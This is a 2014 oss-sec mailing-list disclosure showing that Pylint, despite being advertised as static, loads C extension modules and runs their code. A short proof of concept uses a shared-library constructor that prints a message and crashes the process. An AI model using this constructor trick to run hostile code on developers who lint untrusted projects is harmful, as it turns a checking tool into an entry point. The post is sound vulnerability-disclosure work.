oss-sec mailing list archives
Pylint checks not as static as one would think
From: Jakub Wilk <jwilk () jwilk net>
Date: Mon, 29 Sep 2014 14:32:21 +0200
Pylint[0] is advertised as "a static code checker, meaning it can analyse your code without actually running it"[1] and that it "does not import live modules"[1].
This is, unfortunately, far from reality. Here's a PoC:
$ cat moo.py
from _moo import *
$ cat moo.c
#include <stdio.h>
#include <signal.h>
void __attribute__((constructor)) moo() {
printf("moo!\n");
kill(0, SIGSEGV);
}
$ gcc -Wall -shared -fPIC moo.c -o _moo.so
$ pylint moo.py
No config file found, using default configuration
moo!
Segmentation fault
My understanding is that upstream Pylint maintainers consider this
behavior intentional[2]. But even then, I think it's a serious
documentation flaw.
Should a CVE ID be assigned to this bug? If yes, it should be a CVE-2010-XXXX.
[0] http://www.pylint.org/ [1] http://docs.pylint.org/faq.html#about-pylint [2] https://bugs.debian.org/591676#28 -- Jakub Wilk
Current thread:
- Pylint checks not as static as one would think Jakub Wilk (Sep 29)
- Re: Pylint checks not as static as one would think cve-assign (Sep 29)